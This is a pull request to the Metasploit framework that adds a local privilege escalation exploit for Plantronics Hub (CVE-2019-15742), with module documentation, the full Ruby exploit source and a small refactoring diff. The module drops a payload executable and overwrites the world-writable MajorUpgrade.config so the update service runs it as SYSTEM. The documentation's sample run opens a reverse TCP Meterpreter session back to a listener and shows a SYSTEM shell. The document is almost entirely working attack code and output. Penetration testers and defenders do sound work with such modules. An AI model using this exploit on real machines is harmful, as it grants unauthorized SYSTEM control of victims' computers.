### PR TITLE
Add Plantronics Hub SpokesUpdateService Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md
+++ b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md
@@ -1,0 +1,63 @@
+## Description
+
+  The Plantronics Hub client application for Windows makes use of an
+  automatic update service `SpokesUpdateService.exe` which automatically
+  executes a file specified in the `MajorUpgrade.config` configuration
+  file as SYSTEM. The configuration file is writable by all users by default.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on [Plantronics Hub version 3.13.2](https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe) on Windows 7 SP1 (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
+  msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
+  [*] The service is running, but could not be validated.
+  msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ...
+  [*] Writing configuration file to C:\ProgramData\Plantronics\Spokes3G\MajorUpgrade.config ...
+  [*] Sending stage (180291 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49431) at 2020-01-03 14:55:46 -0500
+  [-] Failed to delete C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > 
+  ```
+

--- a/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
+++ b/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
@@ -68,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if srv_info && srv_info[:display].empty?
-      vprint_warning("Service '#{service}' does not exist.")
       return false
     end
 
@@ -79,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Local
     service = 'PlantronicsUpdateService'
 
     unless service_exists? service
-      return CheckCode::Safe("#{service} does not exist")
+      return CheckCode::Safe("Service '#{service}' does not exist")
     end
 
-    path = "C:\\ProgramData\\Plantronics\\Spokes3G"
+    path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G"
 
     unless exists? path
-      return CheckCode::Safe("#{path} does not exist")
+      return CheckCode::Safe("Directory '#{path}' does not exist")
     end
 
     CheckCode::Detected
@@ -97,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if is_system?
-      fail_with Failure::BadConfig, 'Session already has root privileges'
+      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
     end
 
     payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
@@ -106,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
     write_file payload_path, payload_exe
     register_file_for_cleanup payload_path
 
-    config_path = "C:\\ProgramData\\Plantronics\\Spokes3G\\MajorUpgrade.config"
+    config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config"
     vprint_status "Writing configuration file to #{config_path} ..."
     write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}"
     register_file_for_cleanup config_path

--- a/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
+++ b/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
@@ -1,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Services
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
+      'Description'    => %q{
+        The Plantronics Hub client application for Windows makes use of an
+        automatic update service `SpokesUpdateService.exe` which automatically
+        executes a file specified in the `MajorUpgrade.config` configuration
+        file as SYSTEM. The configuration file is writable by all users by default.
+
+        This module has been tested successfully on Plantronics Hub version 3.13.2
+        on Windows 7 SP1 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Markus Krell', # Discovery and PoC
+        'bcoles'        # Metasploit
+      ],
+      'References'     =>
+        [
+          ['CVE', '2019-15742'],
+          ['EDB', '47845'],
+          ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf']
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => '2019-08-30',
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
+  end
+
+  def service_exists?(service)
+    srv_info = service_info(service)
+
+    if srv_info.nil?
+      vprint_warning 'Unable to enumerate Windows services'
+      return false
+    end
+
+    if srv_info && srv_info[:display].empty?
+      vprint_warning("Service '#{service}' does not exist.")
+      return false
+    end
+
+    true
+  end
+
+  def check
+    service = 'PlantronicsUpdateService'
+
+    unless service_exists? service
+      return CheckCode::Safe("#{service} does not exist")
+    end
+
+    path = "C:\\ProgramData\\Plantronics\\Spokes3G"
+
+    unless exists? path
+      return CheckCode::Safe("#{path} does not exist")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
+    payload_exe = generate_payload_exe
+    vprint_status "Writing payload to #{payload_path} ..."
+    write_file payload_path, payload_exe
+    register_file_for_cleanup payload_path
+
+    config_path = "C:\\ProgramData\\Plantronics\\Spokes3G\\MajorUpgrade.config"
+    vprint_status "Writing configuration file to #{config_path} ..."
+    write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}"
+    register_file_for_cleanup config_path
+  end
+end


### PR DESCRIPTION
Add Plantronics Hub SpokesUpdateService Privilege Escalation module.

        The Plantronics Hub client application for Windows makes use of an
        automatic update service `SpokesUpdateService.exe` which automatically
        executes a file specified in the `MajorUpgrade.config` configuration
        file as SYSTEM. The configuration file is writable by all users by default.

        This module has been tested successfully on Plantronics Hub version 3.13.2
        on Windows 7 SP1 (x64).

Resolves #12781